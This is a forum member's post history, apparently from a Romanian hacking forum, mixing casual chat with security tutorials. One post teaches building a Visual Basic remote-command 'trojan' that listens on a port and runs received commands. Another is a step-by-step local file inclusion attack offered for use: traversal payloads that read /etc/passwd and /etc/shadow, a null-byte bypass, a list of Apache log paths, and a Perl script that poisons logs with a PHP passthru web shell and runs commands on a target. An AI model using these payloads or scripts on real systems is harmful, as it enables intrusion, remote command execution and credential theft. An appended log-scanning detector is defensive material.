vladiii

Active Members
  • Posts

    552

Everything posted by vladiii

  1. let's say mine is simpler
  2. well, it works for me and my friends... you're surely not doing something right... what version of Messenger do you have?
  3. I wrote this for HackThisSite.org almost a year ago. Before you flame me: I don't care if you think VB is a noob language. It very well may be, but pointing it out in this topic doesn't help anyone. Also note that when I posted it on HTS, it removed all of the tabs I had put in, which is why the code looks pretty sloppy. Oh, and at some spots it put in returns where it wasn't supposed to. I think anyone with half a brain could figure out where to remove the returns.

     In this tutorial you will learn about:
     - Client/Server applications
     - Winsock functions
     - Left()
     - Right()
     - Select Case

     First off you need to learn about client/server applications (note: this tutorial is for basic trojans and not for more advanced features like reverse connecting, those will be covered in a later tutorial if ever).

     Client/Server applications are broken into 2 parts, as one may guess. The client and the server. The client is the program that is connecting to the server and the server is accepting connections (although you can have it reverse connect to get by the router but that's not for this tutorial). Basically the server is 'listening' for a connection and once a client attempts to connect to the server, the server accepts the connection and boom a connection is made. Once connected, you can send data from the client to the server and vice versa. An example would be a simple chat program where you're sending a message back and forth and the message is displayed on the other's screen.

     Now how can we do something like this in Visual Basic? It's quite simple. Since this is a test I'm just going to have you create ONE application with two forms rather than two applications, but you can create two applications if you wish and just follow the general instructions of this tutorial.

     Alright, first off we should create a listening server. Open up VB and make a standard EXE and add another form so you have Form1 and Form2. Rename the forms (change their .name properties) to frmClient and frmServer. Go to Project -> Components and put a check next to "Microsoft Winsock Control 6.0," if you do not have this control, do not worry! A simple Google search for "MSWINSCK.OCX" will find you a download in no time (note: it goes in %systemroot%/system32/). Alright, now hit OK.

     What we just did: We added Microsoft's Winsock control to our toolbox. You can see that it is the last object on your toolbox (it has an icon that looks like 2 computers with a red wire connecting them).

     Add this control onto frmServer and change its .name property to sckServer. Open up the code for frmServer and let's take a look at some of the subroutines/functions that the winsock control has. To do this, I usually type in "sckServer." and a little list pops up with all the properties, etc. Here's one that looks interesting: "sckServer.Listen." There aren't any arguments for it so we need to find a way to set what port it's listening on or else it will error. Luckily another thing that I see in the list is "sckServer.LocalPort." Let's try to edit this to be what port we want. I'll be using 1234 for this example. Let's add some code to the Form_Load() subroutine of frmServer to do what we just found out:

         Private Sub Form_Load()
             sckServer.LocalPort = 1234
             sckServer.Listen
         End Sub

     Go to Project -> Project 1 Properties... and change the Startup Object to frmServer. Save the program and run it. It seems to work fine, right? But there's nothing connecting to us so there's nothing to do. Even if they did try to connect to us, it would reject it because all we're doing is listening, not accepting. Let's add in accepting. I see that there is a subroutine that is called whenever someone tries connecting. It's called "ConnectionRequest:"

         Private Sub sckServer_ConnectionRequest(ByVal requestID As Long)
         End Sub

     Well it's very simple to make it accept so here it is:

         Private Sub sckServer_ConnectionRequest(ByVal requestID As Long)
             sckServer.Accept requestID
         End Sub

     Now let's make our client... Add a winsock control to frmClient and name it sckClient. Add 3 text boxes and 2 command buttons. Name them accordingly:

         Current Name:  New Name:    New .caption/.text Value
         Text1:         txtIP:       IP Address
         Text2:         txtPort:     Port
         Text3:         txtMsg:      Type your message here
         Command1:      cmdConnect
         Command2:      cmdShowMsg

     Now here's the commented code for this page:

         Private Sub cmdConnect_Click()
             'Connect using sckClient
             sckClient.Connect txtIP.Text, txtPort.Text
         End Sub

         Private Sub cmdShowMsg_Click()
             'Send data to the server containing msg| and then the message you wish to show
             sckClient.SendData "msg|" & txtMsg.Text
         End Sub

         Private Sub sckClient_Connect()
             'Let us know that we're connected!
             MsgBox "Connected!", vbInformation, "Client"
         End Sub

         Private Sub sckClient_Error(ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean)
             MsgBox Description, vbCritical, "Error"
         End Sub

     Surprisingly enough, that's it for the client. Now let's go back to the server and have it accept data... In frmServer:

         Private Sub sckServer_DataArrival(ByVal bytesTotal As Long)
             'Define variables:
             Dim strData As String, strCommand As String, strArgument As String
             'Get the data received and put it into strData:
             sckServer.GetData strData
             'Grabs the left 4 characters of strData (EG: "msg|"):
             strCommand = Left(strData, 4)
             'Grabs everything to the right of the command (EG: "This is a test" in the string "msg|This is a test"):
             strArgument = Right(strData, Len(strData) - Len(strCommand))
             Select Case strCommand
                 'Sent the command to show an error message, show the error message:
                 Case "msg|": MsgBox strArgument
                 '[add more commands using this format]
             End Select
         End Sub

     Well, that all works and everything is fine! But why isn't frmClient showing up? That's because we have frmServer set as our startup form. Just add this code into frmServer's form_load subroutine:

         frmClient.Show

     Alright. We test it out and try to connect to ourselves ("127.0.0.1") and we get an error on this line:

         sckServer.Accept requestID

     Apparently it isn't working how we want it to, but not to fear! Just add this line of code above it to Close the server (stop it from listening) and then accept the connection:

         sckServer.Close

     OK. We test it out and it works fine! We close the program because we're done and we go back to the source and now we're going to try out some other stuff.... actually, take off the "we," this is extra practice for you!

     Extra practice: Add a button onto the client that closes the current connection (HINTS: sckClient.Close and sckServer_Close()) (don't forget that you need to start listening again after it closes or else it won't accept connections). Add in more functions for the client! Keep the commands 3 letters long with the "|" character at the end of them. A few ideas are "del|" to delete a file and "cpy|" to copy itself to a specific directory.

     Happy programming! Full source code included below for you lazy people.

         '''''frmClient:'''''
         Private Sub cmdConnect_Click()
             'Connect using sckClient
             sckClient.Connect txtIP.Text, txtPort.Text
         End Sub

         Private Sub cmdShowMsg_Click()
             'Send data to the server containing msg| and then the message you wish to show
             sckClient.SendData "msg|" & txtMsg.Text
         End Sub

         Private Sub sckClient_Connect()
             'Let us know that we're connected!
             MsgBox "Connected!", vbInformation, "Client"
         End Sub

         Private Sub sckClient_Error(ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean)
             MsgBox Description, vbCritical, "Error"
         End Sub

         '''''frmServer:'''''
         Private Sub Form_Load()
             sckServer.LocalPort = 1234
             sckServer.Listen
             frmClient.Show
         End Sub

         Private Sub sckServer_ConnectionRequest(ByVal requestID As Long)
             sckServer.Close
             sckServer.Accept requestID
         End Sub

         Private Sub sckServer_DataArrival(ByVal bytesTotal As Long)
             'Define variables:
             Dim strData As String, strCommand As String, strArgument As String
             'Get the data received and put it into strData:
             sckServer.GetData strData
             'Grabs the left 4 characters of strData (EG: "msg|"):
             strCommand = Left(strData, 4)
             'Grabs everything to the right of the command (EG: "This is a test" in the string "msg|This is a test"):
             strArgument = Right(strData, Len(strData) - Len(strCommand))
             Select Case strCommand
                 'Sent the command to show an error message, show the error message:
                 Case "msg|": MsgBox strArgument
                 '[add more commands using this format]
             End Select
         End Sub

     credit: JETT from #milw0rm.org
  4. vladiii

    Hi

    loool this one is 100% Romanian
  5. @ping: don't put a space between msg: and the Messenger ID and it will surely work for you
  6. if you want to see whether someone is online/offline (it doesn't matter if they put you on ignore or are invisible), type in the box where you chat with them: msg:id and an icon will appear showing online/offline (a smiley face for online and a sad face for offline). Example... I open a conversation with ciriboflacs and type in the box where I chat with him: msg:ciriboflacs and I see whether he is online or not... right now he is not online. enjoy it !!!
  7. thanks guys :D I promised you that if I got internet on my computer I would take care of this forum... this was the first tutorial, many more will follow... just wait
  8. Hello! In this tutorial you will learn how to exploit an LFI vulnerability in a site. First, let's look at this small piece of PHP code:

         <?php
         $page = $_GET['page'];
         include($page);
         ?>

     This is code that should never be used; it is vulnerable to LFI because the $page variable is not sanitized. OK, now let's take advantage of this vulnerability, using the following code:

         site.host/index.php?page=../../../../../../../etc/passwd

     If the site is hosted on Unix, the users' passwords are stored in /etc/passwd, and the code above shows us these passwords and the usernames. Now all you have left to do is decode the password. An encrypted password should look something like this:

         username:x:503:100:FullName:/home/username:/bin/sh

     In this example the password is x; another example of a password is:

         username:!:503:100:FullName:/home/username:/bin/sh

     Other "places" where you can find passwords, besides /etc/passwd, would be:

         /etc/shadow
         /etc/group
         /etc/security/group
         /etc/security/passwd
         /etc/security/user
         /etc/security/environ
         /etc/security/limits

     In case the browser shows a .php at the end of the include (and, naturally, /etc/passwd.php will not exist), add %00 at the end of the include; the server will ignore everything written after %00. Example:

         site.host/index.php?file=../../../../../../../../etc/passwd%00

     Now we will try to run commands on the server by injecting PHP code into the logs and then running it. A few log locations:

         ../apache/logs/error.log
         ../apache/logs/access.log
         ../../apache/logs/error.log
         ../../apache/logs/access.log
         ../../../apache/logs/error.log
         ../../../apache/logs/access.log
         ../../../../../../../etc/httpd/logs/acces_log
         ../../../../../../../etc/httpd/logs/acces.log
         ../../../../../../../etc/httpd/logs/error_log
         ../../../../../../../etc/httpd/logs/error.log
         ../../../../../../../var/www/logs/access_log
         ../../../../../../../var/www/logs/access.log
         ../../../../../../../usr/local/apache/logs/access_log
         ../../../../../../../usr/local/apache/logs/access.log
         ../../../../../../../var/log/apache/access_log
         ../../../../../../../var/log/apache2/access_log
         ../../../../../../../var/log/apache/access.log
         ../../../../../../../var/log/apache2/access.log
         ../../../../../../../var/log/access_log
         ../../../../../../../var/log/access.log
         ../../../../../../../var/www/logs/error_log
         ../../../../../../../var/www/logs/error.log
         ../../../../../../../usr/local/apache/logs/error_log
         ../../../../../../../usr/local/apache/logs/error.log
         ../../../../../../../var/log/apache/error_log
         ../../../../../../../var/log/apache2/error_log
         ../../../../../../../var/log/apache/error.log
         ../../../../../../../var/log/apache2/error.log
         ../../../../../../../var/log/error_log
         ../../../../../../../var/log/error.log

     OK, now let's take a look at the log in which non-existent pages are recorded, and at the following code: <? passthru(\$_GET[cmd]) ?>. If we type in the browser:

         site.host/<? passthru(\$_GET[cmd]) ?>

     it will obviously show us a page saying that this code does not exist on the server, because the browser automatically encodes the URL, and the page we accessed is translated by the browser into:

         site.host/%3C?%20passthru(\$_GET[cmd])%20?>

     So we will have to do something else... We can use the following Perl script:

         #!/usr/bin/perl -w
         use IO::Socket;
         use LWP::UserAgent;
         $site="victim.com";
         $path="/folder/";
         $code="<? passthru(\$_GET[cmd]) ?>";
         $log = "../../../../../../../etc/httpd/logs/error_log";
         print "Trying to inject the code";
         $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die "\nConnection Failed.\n\n";
         print $socket "GET ".$path.$code." HTTP/1.1\r\n";
         print $socket "User-Agent: ".$code."\r\n";
         print $socket "Host: ".$site."\r\n";
         print $socket "Connection: close\r\n\r\n";
         close($socket);
         print "\nCode $code sucssefully injected in $log \n";
         print "\nType command to run or exit to end: ";
         $cmd = <STDIN>;
         while($cmd !~ "exit") {
             $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die "\nConnection Failed.\n\n";
             print $socket "GET ".$path."index.php=".$log."&cmd=$cmd HTTP/1.1\r\n";
             print $socket "Host: ".$site."\r\n";
             print $socket "Accept: */*\r\n";
             print $socket "Connection: close\r\n\n";
             while ($show = <$socket>) { print $show; }
             print "Type command to run or exit to end: ";
             $cmd = <STDIN>;
         }

     Copy/paste this and save it as ex.pl, but don't forget to change the following things in the exploit:
     1) change the site name
     2) change the log name and the path to it
     3) change index.php= to whatever you want

     Run the script and it will ask you which commands to run !!! You can manage from here on !!!

     Useful links: http://www.milw0rm.com/video/watch.php?id=57 This is a short video tutorial; try to watch it, because it is very good.

     Proof of Concept: Original author (in English): d3fcrash. Translation and adaptation + modifications: vladii
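
The requests this tutorial relies on (../ traversal, a trailing %00, PHP tags written into a log, and a later include of that log) all leave marks in the web server's access log. The following detection sketch is an added example, not part of the original post or of any project's code; the Apache combined log format, the rule names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Apache "combined" line; the target is lazy because a hand-written request may contain spaces.
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>.*?) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>.*?)" "(?P<agent>.*)"$')

# Rules applied to the percent-decoded request target (rule names are illustrative).
TARGET_RULES = {
    "traversal": re.compile(r'(?:\.\.[\\/]){2,}'),
    "null_byte": re.compile(r'\x00'),
    "sensitive_file": re.compile(r'/etc/(?:passwd|shadow|group|security/)'),
    "log_include": re.compile(r'(?:access|error)[._]log'),
}
PHP_TAG = re.compile(r'<\?')  # PHP open tag in a field that ends up in a log file

def decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is normalised too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return the sorted names of the rules that fire for one log line."""
    m = LINE.match(line)
    if not m:
        return ["unparsed"]
    target = decode(m["target"])
    hits = {name for name, rx in TARGET_RULES.items() if rx.search(target)}
    if any(PHP_TAG.search(decode(m[f])) for f in ("target", "referer", "agent")):
        hits.add("php_tag")
    return sorted(hits)

def scan(lines):
    return {i: hits for i, hits in enumerate(map(classify, lines)) if hits}

# Constructed sample lines (documentation address range, not real traffic).
TS = "[10/Oct/2024:13:55:36 +0000]"
SAMPLE = [
    f'203.0.113.7 - - {TS} "GET /index.php?page=news HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    f'203.0.113.9 - - {TS} "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 1840 "-" "Mozilla/5.0"',
    f'203.0.113.9 - - {TS} "GET /index.php?file=..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1" 200 1840 "-" "Mozilla/5.0"',
    f'203.0.113.9 - - {TS} "GET /folder/<?php /* constructed */ ?> HTTP/1.1" 404 210 "-" "<?php /* constructed */ ?>"',
    f'203.0.113.9 - - {TS} "GET /index.php?page=../../../var/log/apache2/access.log HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]
```

Calling scan(SAMPLE) returns findings for every line except the benign first one; a 200 status on a line flagged for traversal or log inclusion is the case to triage first.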
  9. then here are a few more; you can find them on Google if need be, I'm only posting some images: http://www.myforum.ro/images/template/21-clanz-darkness.jpg http://www.myforum.ro/images/template/56-counter-strike.jpg this one is cooler, enjoy it
  10. cookie stealer: you go get yourself an XSS and then we'll talk... I can't believe that on such a big forum we are still talking about "how to crack a Messenger ID"
  11. if I'm not being too indiscreet... why don't you keep sysgh0st's template any more??? you could find a nice little template here: http://www.themesbase.com/?view=4204
  12. maybe this small comparison between the 2 phones will help you a bit: http://www.gsmland.ro/compare.php?brandId1=1&brandId2=4&modelId1=1001&modelId2=390 from what I see there, the Samsung E900 is somewhat better... go for it
  13. I got silver at the ONM, 1 point short of the gold medal... next come the selection tests for the OBMJ
  14. are you still dealing with this kind of thing?
  15. for now I'm limiting myself to gold at the national olympiad. but in the future, who knows...
  16. cradle of filth-her ghost in fog
  17. to win a gold medal at the International Mathematical Olympiad
  18. did you make it, kw3?
  19. English and German
  20. 6. -t ttl - sets the TTL (time to live) field of the ICMP packets sent. Allowed values: 1-255. Example: 1. We send 10 packets to www.google.ro: # ping -c 10 www.google.ro 2. We want to test connectivity with 127.0.0.1 using 1024-byte packets from the local network: # ping -s 1024 127.0.0.1 sorry for the 3 posts, but I posted from my phone and couldn't fit more than 450 characters in a post. enjoy it!
  21. 2. -f (flood) - sends echo-request packets without waiting for the echo-reply packets to arrive. For each echo-request sent it prints a "." and for each echo-reply received it prints a "backspace". 3. -n (numeric) - the destination is shown only numerically (by IP address), without trying to find aliases, domain names, etc. 4. -c count - the number of echo-request packets sent. 5. -s packetsize - the size of the ICMP packet that is sent. ...
  22. Ping is a command that helps us check IP-level connectivity between 2 computers connected to the same network or to the Internet. Ping only tests connectivity between the local computer and the remote one. The format of the command is: # ping [-b] [-n] [-c count] [-s packetsize] [-t ttl] destination. The parameters have the following meaning: 1. -b (broadcast) - allows pinging a broadcast address. ...
  23. what do you guys have against him? it was actually funny...
  24. since I no longer have internet, Winamp and Adobe Photoshop
  25. I also have a pirated Windows and the genuine errors never showed up for me.